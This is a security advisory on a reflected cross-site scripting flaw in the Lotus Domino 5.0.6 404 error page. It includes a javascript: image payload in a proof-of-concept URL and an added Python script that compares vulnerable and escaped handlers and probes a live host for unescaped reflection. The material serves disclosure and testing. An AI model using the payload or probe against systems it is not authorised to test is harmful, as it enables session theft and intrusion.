Vulnerability
  Domino Server

Affected
  Lotus Domino Server 5.0.6

Description
  Hiromitsu Takagi found the following. Accessing the URL below causes the JavaScript it carries to be executed in the browser in the security context of the server's domain: the Domino 404 error page reflects the name of the missing design note, taken from the request path, into the HTML response without escaping it.

  http://www.lotus.com/home.nsf/<img%20src=javascript:alert(document.domain)>

  This page produces output like this:

  =================================================
  Error 404
  HTTP Web Server: Couldn't find design note - ******
  ----------------------------------------------------------------------------
  Lotus-Domino Release 5.0.6a
  =================================================

  ******: The JavaScript code is executed here.

  This vulnerability is quite similar to the "IIS cross-site scripting vulnerabilities (MS00-060)" reported by Microsoft.

Solution
  This was reproduced and documented as SPR #JCHN4V2HUY. Lotus are currently researching a fix and plan to address it in Domino R5.0.9. When the fix is available, it will be documented at http://www.notes.net/r5fixlist.nsf
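The following is an added example, not part of the advisory and not Domino's code. It models the reported behaviour with two toy 404 handlers (a vulnerable one that reflects the missing design-note name verbatim and a hardened one that HTML-escapes it), builds the probe path from the advisory, and checks whether the probe comes back unescaped. The handler bodies, the function names and the optional live check against a host given on the command line are assumptions made for illustration; the probe string and the error text are the advisory's.

```python
import html
import http.client
import sys
from urllib.parse import unquote

# Probe taken from the advisory: an <img> whose src is a javascript: URL.
PAYLOAD = "<img src=javascript:alert(document.domain)>"


def _note_name(request_path):
    """Last path segment, percent-decoded (e.g. '%20' -> ' '),
    standing in for the design note Domino failed to find."""
    return unquote(request_path.rsplit("/", 1)[-1])


def vulnerable_404(request_path):
    """Model (assumption, not Domino's code) of a 404 handler that
    reflects the unknown design-note name into the HTML body verbatim."""
    note = _note_name(request_path)
    return (
        "<html><body>"
        "Error 404<br>"
        "HTTP Web Server: Couldn't find design note - " + note + "<hr>"
        "Lotus-Domino Release 5.0.6a"
        "</body></html>"
    )


def hardened_404(request_path):
    """Same handler with the reflected value HTML-escaped: '<', '>', '&',
    '\"' and \"'\" become entities, so the browser shows the probe as text
    instead of parsing it as markup."""
    note = html.escape(_note_name(request_path), quote=True)
    return (
        "<html><body>"
        "Error 404<br>"
        "HTTP Web Server: Couldn't find design note - " + note + "<hr>"
        "Lotus-Domino Release 5.0.6a"
        "</body></html>"
    )


def probe_path(base_path="/home.nsf/"):
    """Request path as used in the advisory. The space must be sent as
    %20 or the request line is malformed; '<' and '>' are left raw."""
    return base_path + PAYLOAD.replace(" ", "%20")


def is_reflected_unescaped(body):
    """True if the probe survives in the response byte-for-byte, i.e. the
    server did not encode it. A body that only contains the escaped form
    (&lt;img ...&gt;) counts as safe."""
    return PAYLOAD in body


def check_live(host, base_path="/home.nsf/", timeout=5):
    """Send the probe over plain HTTP to a host you are authorised to test
    and report whether its error page reflects it unescaped."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("GET", probe_path(base_path))
        resp = conn.getresponse()
        body = resp.read().decode("latin-1", "replace")
    finally:
        conn.close()
    return resp.status, is_reflected_unescaped(body)


if __name__ == "__main__":
    path = probe_path()
    print("probe:", path)
    for name, handler in (("vulnerable", vulnerable_404),
                          ("hardened", hardened_404)):
        print(name, "reflects probe unescaped:",
              is_reflected_unescaped(handler(path)))
    if len(sys.argv) > 1:
        # Constructed usage: python xss_404.py host.example
        print(sys.argv[1], check_live(sys.argv[1]))
```

Two practical caveats. First, the check only tells you whether the server echoes untrusted input into HTML unencoded; that is the defect, regardless of which vector is used. The advisory's `javascript:` URL in an `img src` executed in browsers of the time, but current browsers do not run script from that attribute, so a present-day test of the same reflection would use a different vector (a `<script>` element or an event-handler attribute). Second, `document.domain` in the proof of concept is there to show that the script runs with the server's origin (www.lotus.com), which is what makes a reflected error page, not just a "real" application page, a cross-site scripting issue.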